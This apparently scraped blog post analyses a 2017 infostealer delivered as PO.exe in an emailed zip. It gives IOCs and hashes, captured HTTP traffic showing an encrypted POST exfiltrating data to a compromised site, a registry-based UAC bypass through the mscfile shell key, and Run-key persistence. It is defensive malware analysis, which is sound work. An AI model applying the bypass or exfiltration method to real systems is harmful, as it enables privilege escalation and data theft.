\nhttp:\/\/enigma0x3.net\/2016\/07\/22\/bypassing-uac-on-windows-10-using-disk-cleanup\/<\/a>
\nhttp:\/\/isc.sans.edu\/forums\/diary\/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware\/22011\/<\/a><\/p>\n
For the artifacts, ProcMon logs, and the PCAP from the investigation, please see my Github repo here<\/a>. <\/p>\n IOCs: Artifacts: File name: PO.exe File name: TPO.exe File name: Xum.exe File name: E39.exe Analysis: And then starts POST’ing information back to the compromised site. Below is an example of one of the POSTs. <\/p>\n Since the traffic was encrypted there was no telling what information was being communicated back to the compromised host. <\/p>\n Moving from the network to the host, this is where it gets interesting. <\/p>\n This malware seems to be using a UAC bypass technique where the malware itself is running in a lower privilege, but is still able to get the process started in a higher privilege mode by setting the registry key “HKCU\\Software\\Classes\\mscfile\\shell\\open\\command” to call Powershell.<\/p>\n As seen in the image above, as soon as the key is created, and then modified, it then deletes itself from the registry to tidy itself up.<\/p>\n Persistence for this infection is done by modifying the “HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run” key to run the “TPO.exe” binary.<\/p>\n After rebooting the VM, I noticed that the same process ran again where the Event Viewer would open automatically and a command window would open and then close quickly as seen in the video located here<\/a>. So most likely the binary that is in the “Run” key is performing the same UAC bypass all over again. Each time the system is rebooted, there is a new binary placed in the %TEMP% directory as well. That is why “Xum.exe” and “E39.exe” have the same hash and is most likely being created by the “TPO.exe” process when rebooted.<\/p>\n","protected":false},"excerpt":{"rendered":" A quick write-up on a generic infostealer that also uses a UAC bypass technique. I could not find much about this malware outside that it was a generic information stealing malware. For some interesting reading on how to bypass UAC within Windows, please see the following links: http:\/\/enigma0x3.net\/2016\/08\/15\/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking\/ http:\/\/enigma0x3.net\/2016\/07\/22\/bypassing-uac-on-windows-10-using-disk-cleanup\/ http:\/\/isc.sans.edu\/forums\/diary\/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware\/22011\/ For the artifacts, ProcMon logs, and the PCAP from the investigation, please see my Github repo here. IOCs: ===== 216.146.43.70 \/ checkip[.]dyndns.org (GET \/) 37.72.171.98 \/ yatupaints[.]com (POST \/WebPanel\/api.php) Artifacts: ========== File name: PO.zip File size: 128KB File path: NA MD5 hash: 96d897d444793e2aea70cf6b28224eac Virustotal: http:\/\/www.virustotal.com\/#\/file\/4e01b1b9f1d1068de5d461f4469c7bfc1ccc906b182ee7354b6b6879e5110fdd\/detection Detection ratio: 7 \/ 63…<\/p>\n![\"\"](\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/11\/Email.png\")
<\/a><\/p>\n
\n=====
\n216.146.43.70 \/ checkip[.]dyndns.org (GET \/)
\n37.72.171.98 \/ yatupaints[.]com (POST \/WebPanel\/api.php)<\/p>\n
\n==========
\nFile name: PO.zip
\nFile size: 128KB
\nFile path: NA
\nMD5 hash: 96d897d444793e2aea70cf6b28224eac
\nVirustotal: http:\/\/www.virustotal.com\/#\/file\/4e01b1b9f1d1068de5d461f4469c7bfc1ccc906b182ee7354b6b6879e5110fdd\/detection<\/a>
\nDetection ratio: 7 \/ 63
\nFirst detected: 2017-10-30 11:18:21<\/p>\n
\nFile size: 147KB
\nFile path: NA
\nMD5 hash: 0c5e779aa368674ab500d75c2ada0cb6
\nVirustotal: http:\/\/www.virustotal.com\/#\/file\/868988a9a06c040a9cdf4b194b91ddafd588efc2f5bf5f2cd3382d97ae1a0372\/detection<\/a>
\nDetection ratio: 17 \/ 67
\nFirst detected: 2017-10-30 11:19:16<\/p>\n
\nFile size: 144KB
\nFile path: C:\\Users\\Administrator\\AppData\\Local\\Temp\\Terry\\
\nMD5 hash: 0c5e779aa368674ab500d75c2ada0cb6
\nVirustotal: http:\/\/www.virustotal.com\/#\/file\/868988a9a06c040a9cdf4b194b91ddafd588efc2f5bf5f2cd3382d97ae1a0372\/detection<\/a>
\nDetection ratio: 17 \/ 67
\nFirst detected: 2017-10-30 11:19:16<\/p>\n
\nFile size: 10.5KB
\nFile path: C:\\Users\\Administrator\\AppData\\Local\\Temp\\
\nMD5 hash: f683769b947501b5a98376619d5938bb
\nVirustotal: http:\/\/www.virustotal.com\/#\/file\/c2cae82e01d954e3a50feaebcd3f75de7416a851ea855d6f0e8aaac84a507ca3\/detection<\/a>
\nDetection ratio: 12 \/ 68
\nFirst detected: 2017-10-24 09:59:27
\nHybrid-Analysis: http:\/\/www.hybrid-analysis.com\/sample\/c2cae82e01d954e3a50feaebcd3f75de7416a851ea855d6f0e8aaac84a507ca3?environmentId=100<\/a><\/p>\n
\nFile size: 10.5KB
\nFile path: C:\\Users\\Administrator\\AppData\\Local\\Temp\\
\nMD5 hash: f683769b947501b5a98376619d5938bb
\nVirustotal: http:\/\/www.virustotal.com\/#\/file\/c2cae82e01d954e3a50feaebcd3f75de7416a851ea855d6f0e8aaac84a507ca3\/detection<\/a>
\nDetection ratio: 12 \/ 68
\nFirst detected: 2017-10-24 09:59:27
\nHybrid-Analysis: http:\/\/www.hybrid-analysis.com\/sample\/c2cae82e01d954e3a50feaebcd3f75de7416a851ea855d6f0e8aaac84a507ca3?environmentId=100<\/a><\/p>\n
\n=========
\nLike I stated above, the malware was obtained from an email which had a malicious zip file attached to it. Within the zip file, there was nothing but a malicious binary file (PO.exe). Since there was no script to get the callbacks from, I ran the malware inside my VM. From a network perspective, there is very little to this infection. Initially the malware does an IP address lookup:<\/p>\n\r\nGET \/ HTTP\/1.1\r\nHost: checkip.dyndns.org\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nContent-Type: text\/html\r\nServer: DynDNS-CheckIP\/1.0.1\r\nConnection: close\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nContent-Length: 106\r\n\r\n<html><head><title>Current IP Check<\/title><\/head><body>Current IP Address: 104.238.169.94<\/body><\/html><\/pre>\n
\r\nPOST \/WebPanel\/api.php HTTP\/1.1\r\nUser-Agent: Mozilla\/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko\/20100401 Firefox\/4.0 (.NET CLR 3.5.30729)\r\nContent-Type: application\/x-www-form-urlencoded\r\nHost: yatupaints.com\r\nContent-Length: 242\r\nExpect: 100-continue\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 100 Continue\r\n\r\np=G1DZYwdIiDZ6V83seaZCmZSKV8IG2BNrpywIHacb0RH7ctaMCbrVpnO\/hZoBQHJ%2BdorK5fZ6UnnxWGG2N47xMTXHOG06O%2BtXV2jAVMKhsnLYJNncDHiM4Ed\/BTDvYfcRRc9KYJjOkEV0zU5SIVgNldNQsIHvAP59EZ40BrlZCpT1eLkDmBH1SpZl2lDK3erECX2neHaaMQQBbQBnvV2BpGzIZlD6HosKiKj54aVUQs0=\r\n\r\nHTTP\/1.1 200 OK\r\nX-Powered-By: PHP\/5.6.31\r\nContent-Type: text\/html; charset=UTF-8\r\nContent-Length: 2\r\nDate: Mon, 30 Oct 2017 11:31:39 GMT\r\nAccept-Ranges: bytes\r\nServer: LiteSpeed\r\nConnection: close\r\n\r\n\t\t<\/pre>\n
![\"\"](\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/11\/Process-Tree.png\")
<\/a><\/p>\n![\"\"](\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/11\/MSCFile.png\")
<\/a><\/p>\n![\"\"](\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/11\/MSCFile-1.png\")
<\/a><\/p>\n![\"\"](\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/11\/Autorun.png\")
<\/a><\/p>\n